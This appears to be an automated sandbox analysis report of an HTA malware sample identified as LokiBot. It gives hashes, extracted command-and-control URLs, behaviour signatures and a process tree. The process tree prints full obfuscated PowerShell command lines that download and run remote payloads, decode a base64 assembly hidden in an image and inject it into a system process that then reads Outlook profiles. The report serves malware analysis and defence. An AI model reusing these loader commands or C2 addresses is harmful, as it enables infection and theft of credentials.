Analysis
-
max time kernel
100s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
08-11-2024 02:44
Static task
static1
Behavioral task
behavioral1
Sample
534eb483ce1b60f8fdaf67d6a9bbbe6b100247860f85706d2a0dbd86e55de528.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
534eb483ce1b60f8fdaf67d6a9bbbe6b100247860f85706d2a0dbd86e55de528.hta
Resource
win10v2004-20241007-en
General
-
Target
534eb483ce1b60f8fdaf67d6a9bbbe6b100247860f85706d2a0dbd86e55de528.hta
-
Size
207KB
-
MD5
0bac7f117cbea0f1f91bbf5cbe2d1c7c
-
SHA1
d93b06f8ad1f8398874c066ab3d63cdbce77d5bc
-
SHA256
534eb483ce1b60f8fdaf67d6a9bbbe6b100247860f85706d2a0dbd86e55de528
-
SHA512
431c8fa003e4948299d0cd255ff554f75987435c60894301f2a8dbb485d571bcda90734fdd84e29dcdcb5f177cecfb8e1d13d41e71b12c3b9275da5da84da529
-
SSDEEP
96:43F97kMc4sQN+Mc4sQmpxNv5vEB6yackMc4sQtMc4sQ9i5AiMc4sQpQ:43F1kxm+x1pa6yapxYxui5AixyQ
Malware Config
Extracted
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
Extracted
lokibot
http://94.156.177.220/simple/five/fre.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Signatures
-
Lokibot family
-
Blocklisted process makes network request 3 IoCs
Processes:
PowErsHEll.exEpowershell.exeflow pid process 12 3216 PowErsHEll.exE 15 2652 powershell.exe 37 2652 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid process 3380 powershell.exe 2652 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
Processes:
PowErsHEll.exEpowershell.exepid process 3216 PowErsHEll.exE 916 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exeWScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation WScript.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
aspnet_regbrowsers.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook aspnet_regbrowsers.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook aspnet_regbrowsers.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook aspnet_regbrowsers.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2652 set thread context of 4044 2652 powershell.exe aspnet_regbrowsers.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
powershell.execsc.execvtres.exeWScript.exepowershell.exepowershell.exemshta.exePowErsHEll.exEdescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PowErsHEll.exE -
Modifies registry class 1 IoCs
Processes:
PowErsHEll.exEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings PowErsHEll.exE -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
PowErsHEll.exEpowershell.exepowershell.exepowershell.exepid process 3216 PowErsHEll.exE 3216 PowErsHEll.exE 916 powershell.exe 916 powershell.exe 3380 powershell.exe 3380 powershell.exe 2652 powershell.exe 2652 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
PowErsHEll.exEpowershell.exepowershell.exepowershell.exeaspnet_regbrowsers.exedescription pid process Token: SeDebugPrivilege 3216 PowErsHEll.exE Token: SeDebugPrivilege 916 powershell.exe Token: SeDebugPrivilege 3380 powershell.exe Token: SeDebugPrivilege 2652 powershell.exe Token: SeDebugPrivilege 4044 aspnet_regbrowsers.exe -
Suspicious use of WriteProcessMemory 30 IoCs
Processes:
mshta.exePowErsHEll.exEcsc.exeWScript.exepowershell.exepowershell.exedescription pid process target process PID 4552 wrote to memory of 3216 4552 mshta.exe PowErsHEll.exE PID 4552 wrote to memory of 3216 4552 mshta.exe PowErsHEll.exE PID 4552 wrote to memory of 3216 4552 mshta.exe PowErsHEll.exE PID 3216 wrote to memory of 916 3216 PowErsHEll.exE powershell.exe PID 3216 wrote to memory of 916 3216 PowErsHEll.exE powershell.exe PID 3216 wrote to memory of 916 3216 PowErsHEll.exE powershell.exe PID 3216 wrote to memory of 4228 3216 PowErsHEll.exE csc.exe PID 3216 wrote to memory of 4228 3216 PowErsHEll.exE csc.exe PID 3216 wrote to memory of 4228 3216 PowErsHEll.exE csc.exe PID 4228 wrote to memory of 1612 4228 csc.exe cvtres.exe PID 4228 wrote to memory of 1612 4228 csc.exe cvtres.exe PID 4228 wrote to memory of 1612 4228 csc.exe cvtres.exe PID 3216 wrote to memory of 1068 3216 PowErsHEll.exE WScript.exe PID 3216 wrote to memory of 1068 3216 PowErsHEll.exE WScript.exe PID 3216 wrote to memory of 1068 3216 PowErsHEll.exE WScript.exe PID 1068 wrote to memory of 3380 1068 WScript.exe powershell.exe PID 1068 wrote to memory of 3380 1068 WScript.exe powershell.exe PID 1068 wrote to memory of 3380 1068 WScript.exe powershell.exe PID 3380 wrote to memory of 2652 3380 powershell.exe powershell.exe PID 3380 wrote to memory of 2652 3380 powershell.exe powershell.exe PID 3380 wrote to memory of 2652 3380 powershell.exe powershell.exe PID 2652 wrote to memory of 4044 2652 powershell.exe aspnet_regbrowsers.exe PID 2652 wrote to memory of 4044 2652 powershell.exe aspnet_regbrowsers.exe PID 2652 wrote to memory of 4044 2652 powershell.exe aspnet_regbrowsers.exe PID 2652 wrote to memory of 4044 2652 powershell.exe aspnet_regbrowsers.exe PID 2652 wrote to memory of 4044 2652 powershell.exe aspnet_regbrowsers.exe PID 2652 wrote to memory of 4044 2652 powershell.exe aspnet_regbrowsers.exe PID 2652 wrote to memory of 4044 2652 powershell.exe aspnet_regbrowsers.exe PID 2652 wrote to memory of 4044 2652 powershell.exe aspnet_regbrowsers.exe PID 2652 wrote to memory of 4044 2652 powershell.exe aspnet_regbrowsers.exe -
outlook_office_path 1 IoCs
Processes:
aspnet_regbrowsers.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook aspnet_regbrowsers.exe -
outlook_win_path 1 IoCs
Processes:
aspnet_regbrowsers.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook aspnet_regbrowsers.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\534eb483ce1b60f8fdaf67d6a9bbbe6b100247860f85706d2a0dbd86e55de528.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4552 -
C:\Windows\SysWOW64\wINDOwsPoWerSHElL\v1.0\PowErsHEll.exE"C:\Windows\sySTem32\wINDOwsPoWerSHElL\v1.0\PowErsHEll.exE" "POWerSHeLl -eX bYpasS -NOP -w 1 -c DEVICECReDentIaLDePloymeNt.EXE ; iEX($(iEx('[sysTEm.TeXt.eNCOdiNG]'+[CHAR]0X3A+[cHar]0X3A+'UTf8.GEtSTrINg([sysTEm.conVerT]'+[ChAr]58+[CHar]0x3A+'FrOmbASE64StriNG('+[CHar]34+'JHljNFhtWktpaiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZXJEZUZpTml0SW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEphQ3p6SUFkSE9OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhiLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFVGpGLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhoQ0ZaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVENKIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lc3BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0aFAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHljNFhtWktpajo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguNy41Mi8xMzAvc2VldGhlYmVzdHRoaW5nc2V2ZXJtYWRld2l0aG1lY2hhcmFjdGVybmV2ZXJjaGFuZ2UudElGIiwiJGVudjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3NldmVybWFkZXdpdGhtZWNoYXJhY3Rlcm5ldmVyY2gudmJzIiwwLDApO1N0QXJULXNMRUVwKDMpO3NUQVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxzZWV0aGViZXN0dGhpbmdzZXZlcm1hZGV3aXRobWVjaGFyYWN0ZXJuZXZlcmNoLnZicyI='+[cHaR]34+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3216 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpasS -NOP -w 1 -c DEVICECReDentIaLDePloymeNt.EXE3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:916
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gdrcxzkz\gdrcxzkz.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4228 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC63E.tmp" "c:\Users\Admin\AppData\Local\Temp\gdrcxzkz\CSC3201133FAB410990B4FA1EEA111A55.TMP"4⤵
- System Location Discovery: System Language Discovery
PID:1612
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingsevermadewithmecharacterneverch.vbs"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1068 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnWkNHaW1hZ2VVcmwnKycgPSBrcndodHRwczovLzEwMTcuZmlsZW1haWwuYycrJ29tJysnL2FwaS9maWxlL2dldD9maWxla2V5PTJBYV9iVycrJ285JysnUmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVElDZkZobVRLajMnKydMQzZTUXRJY09jX1QzNXcmcGtfdmlkPWZkNGY2MScrJzRiYjIwOWM2MmMxNzMwOTQ1MTc2YTA5MDQnKydmIGtydztaQ0d3ZWJDbGllbicrJ3QgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuVycrJ2ViQ2xpZW50O1pDR2ltYWdlQnl0ZXMgPSBaQ0d3ZWJDbGllbnQuRG93bmxvYWREYScrJ3RhKFpDR2ltYWdlVXJsKTtaQ0dpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhaQ0dpbWFnJysnZUJ5dGVzKTtaQ0dzdGEnKydydEZsYWcgPSBrcnc8PEJBU0U2NF9TVEFSVD4+a3J3O1pDR2VuZEZsYWcgPSBrJysncnc8PEJBUycrJ0U2NCcrJ19FTkQ+PmtydztaQ0dzdGFydEknKyduZGV4ID0gWkNHaW1hZ2VUZXh0LkluZGV4T2YoWkNHc3RhcnRGbGFnKTtaQ0dlbmRJbmRlJysneCA9IFpDR2ltYWcnKydlVGV4dC5JbmRleE9mKFpDR2VuZEZsYWcpO1pDR3N0YXJ0SW5kZXggLWdlIDAgLWFuZCBaQ0dlbmRJbmRleCAtZ3QgWkNHc3RhcnRJbmRleDtaQ0dzdGFydEluZGV4ICs9IFpDR3MnKyd0YXJ0RmxhZy5MZW5ndGg7WkNHYmFzZTY0TGVuZ3RoID0gWkNHZW5kSW5kZXggLSBaQ0dzdGFydEluZGV4O1pDR2Jhc2U2NENvbW0nKydhbmQgPSBaQ0dpbWFnZVRleHQuU3Vic3RyaW5nKFpDR3N0YXInKyd0SW5kZXgsIFpDR2Jhc2U2NExlbmd0aCk7WicrJ0NHYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoWkNHYmFzZTY0QycrJ29tbWFuZC5UbycrJ0NoYXJBcnJheSgpIFpXMyBGb3JFYWNoLU9iamVjdCB7IFpDR18gfSlbLTEuLi0oWkNHYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtaQ0djb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3QnKydyaW5nKFpDR2Jhc2U2NFJldmVycycrJ2VkKTtaQ0dsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGknKydvbi5Bc3NlbWJseV06OkxvYWQoJysnWkNHY29tbWFuZEJ5dGVzKTtaQ0d2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKGtyd1ZBSWtyJysndyk7WkMnKydHdmFpTWV0aG9kLkludm9rZShaQ0dudWxsLCBAKGtyd3R4dCcrJy5MRUxMUE1TLzAnKyczMS8yNS43Ljg2MS40MDEvLzpwdHRoa3J3LCBrcncnKydkZXNhdGl2YWRvJysna3J3LCBrcndkZXNhdGl2YWRva3J3LCBrcndkZXNhdGl2YWRva3J3LCBrcndhc3BuZXRfcmVnYnJvd3NlcnNrcncsIGtyd2Rlc2F0aXZhZG9rJysncncsIGtyd2Rlc2F0aXZhZG9rcncsa3J3ZGVzYXRpdmFkb2tydyxrcndkZXNhdGknKyd2YWRva3J3LGtyd2Rlc2F0aXZhZG9rcncsa3J3ZGVzYXRpdmFkb2tydyxrcndkZXNhdGl2YWRva3InKyd3LGtydzFrcncsa3J3JysnZGVzYXRpdmFkb2tydykpJysnOycpLXJlUGxBQ0UnWkNHJyxbQ2hhcl0zNiAgLWNSZXBsQWNFICAoW0NoYXJdOTArW0NoYXJdODcrW0NoYXJdNTEpLFtDaGFyXTEyNC1jUmVwbEFjRSdrcncnLFtDaGFyXTM5KXwmICggJEVOdjpjb21TcEVDWzQsMjYsMjVdLWpvaW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3380 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('ZCGimageUrl'+' = krwhttps://1017.filemail.c'+'om'+'/api/file/get?filekey=2Aa_bW'+'o9'+'Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3'+'LC6SQtIcOc_T35w&pk_vid=fd4f61'+'4bb209c62c1730945176a0904'+'f krw;ZCGwebClien'+'t = New-Object System.Net.W'+'ebClient;ZCGimageBytes = ZCGwebClient.DownloadDa'+'ta(ZCGimageUrl);ZCGimageText = [System.Text.Encoding]::UTF8.GetString(ZCGimag'+'eBytes);ZCGsta'+'rtFlag = krw<<BASE64_START>>krw;ZCGendFlag = k'+'rw<<BAS'+'E64'+'_END>>krw;ZCGstartI'+'ndex = ZCGimageText.IndexOf(ZCGstartFlag);ZCGendInde'+'x = ZCGimag'+'eText.IndexOf(ZCGendFlag);ZCGstartIndex -ge 0 -and ZCGendIndex -gt ZCGstartIndex;ZCGstartIndex += ZCGs'+'tartFlag.Length;ZCGbase64Length = ZCGendIndex - ZCGstartIndex;ZCGbase64Comm'+'and = ZCGimageText.Substring(ZCGstar'+'tIndex, ZCGbase64Length);Z'+'CGbase64Reversed = -join (ZCGbase64C'+'ommand.To'+'CharArray() ZW3 ForEach-Object { ZCG_ })[-1..-(ZCGbase64Command.Length)];ZCGcommandBytes = [System.Convert]::FromBase64St'+'ring(ZCGbase64Revers'+'ed);ZCGloadedAssembly = [System.Reflecti'+'on.Assembly]::Load('+'ZCGcommandBytes);ZCGvaiMethod = [dnlib.IO.Home].GetMethod(krwVAIkr'+'w);ZC'+'GvaiMethod.Invoke(ZCGnull, @(krwtxt'+'.LELLPMS/0'+'31/25.7.861.401//:ptthkrw, krw'+'desativado'+'krw, krwdesativadokrw, krwdesativadokrw, krwaspnet_regbrowserskrw, krwdesativadok'+'rw, krwdesativadokrw,krwdesativadokrw,krwdesati'+'vadokrw,krwdesativadokrw,krwdesativadokrw,krwdesativadokr'+'w,krw1krw,krw'+'desativadokrw))'+';')-rePlACE'ZCG',[Char]36 -cReplAcE ([Char]90+[Char]87+[Char]51),[Char]124-cReplAcE'krw',[Char]39)|& ( $ENv:comSpEC[4,26,25]-join'')"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2652 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"6⤵
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:4044
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD53d086a433708053f9bf9523e1d87a4e8
SHA1b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA2566f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd
-
Filesize
12KB
MD56d473060dffc65bf2af0506a5b27228f
SHA128faea1e8c4eef41b905614101bfb3720d505b87
SHA256de906f43177753b937548a9634d2d6f9dec494e996e024e66f559222058d6536
SHA512f850cf955a6954d448c6738ab6858bce926f72415009304cd6c4fa1485702d443650eb3268f3ca9ae7082eae7aec7c35e9818cd3d28ab63509137c3c9e12a12c
-
Filesize
18KB
MD5c63356cf14774c3589b227f046ea4216
SHA12f00f2f700d01b2d2af36d5b69810dac9b7e98c4
SHA2568859ad42417f413003de747d36064dd419dd85ad22ef7440d7824f6ffb0a5b01
SHA512e1c1b36c038277b6d9bfac8f7c3f03a910d0cf4b70dca028615dd6154767036b6a2b6f857a66d4719b97928dd2e5daca755a266064a009b1a22d63560a814406
-
Filesize
1KB
MD50f7eb318f9eef5f38f35454dd8a5723a
SHA17d29f90207fba852970a0db8b7ff6f7146ade40f
SHA256590fc407a3024aadfedc095da9e30c0f181f6485c73138f6d2b381afc9f55955
SHA512308547720f305dbd58b5bd3b87f24bc27ade00a6a4127fb87482b672be1808f4c07aca1682211df8ad6bb7eed05a1a011f172e526b5cc372131d676635aac86d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD51f9d36680aa1433615d665dd7b5ba8fa
SHA1380fd773cd1b8d1ceefe01c1864b6a83a5ad5e34
SHA2569bbad54f25feaafc05f9e0b1d324ef6778b340b810bb31e523914a70f50f8e88
SHA512ce57b1807c7f12114ce04e7f5a13c1b5c861502d03b72ca86c02ccec4c9fbf7bf859a6b92a25acb3a37e0ed4cf68fecaaad7c9639326984b50df8995da7a298d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-4089630652-1596403869-279772308-1000\0f5007522459c86e95ffcc62f32308f1_dc5cddf5-9e4b-4c89-ba53-89649a7a5ee7
Filesize46B
MD5d898504a722bff1524134c6ab6a5eaa5
SHA1e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA51226a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-4089630652-1596403869-279772308-1000\0f5007522459c86e95ffcc62f32308f1_dc5cddf5-9e4b-4c89-ba53-89649a7a5ee7
Filesize46B
MD5c07225d4e7d01d31042965f048728a0a
SHA169d70b340fd9f44c89adb9a2278df84faa9906b7
SHA2568c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA51223d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b
-
Filesize
139KB
MD553d91892aead994ebd8ddc00f67b3d20
SHA1817443e7db1cf26edb38767a540f834ba284d4df
SHA256a8db688b3aeb1886027644bc593ee1d43a78ae0137d53bba4d62ec186da9fd06
SHA512e024d38488a9b1778fc2a3efcb10afd6121d7b923c710b9e843f31c367de80f052269cbae90665e4778cdbc563668e543e1aa40f63cf5374bcc7370a63314d08
-
Filesize
652B
MD544e10f8b18829fc2c74bfef4baf449c2
SHA1a120de92f16e07c1959e9eefef395abb8a1c4d47
SHA2563626daa0a914bbf93a13a744a2da57126f3248da4eef70e0c18dbff242d68e3a
SHA512697cc4ef1665914790034fd8e12d97c09a672a56d6ea59ca5610851617a4c4ca49d94684799c5c665f3001c21d0bf737eb336fc685c2be51dd10090dba13a8aa
-
Filesize
463B
MD5e090c5c356e4a5968670e0e1d5b7061a
SHA158e057fd814332db04008226b600f24678a74884
SHA256dfda423d8587c14087a2e1610cbf9a38a780afb0974fa39be6b275f375153d20
SHA51235a2f34fdfeefdcd297aa7ad6f8a2f833885fec60cd4f7798568e9e11294d352dc665d215bb7b7b27ffe5124b6f85c912e2445839167128b397965c1c2eb4217
-
Filesize
369B
MD5eca0e1f59790d34d8d322cce2663317d
SHA101ba5f5e762a6e9cd1b5c2c57ce358f9ae38e3fe
SHA2563b72d4d66dedf462a255b8148db9ac3874ef7d6358d3df4e9162d5f63d3802e2
SHA51243cfc30d2b90e888ff59b979321f757eb4678bcb8e1d15c2e05193936bff0c6f299de5977d3ef122dcc2f3b9cd8d678267d0ddd3977c52e948ed94dbea0da765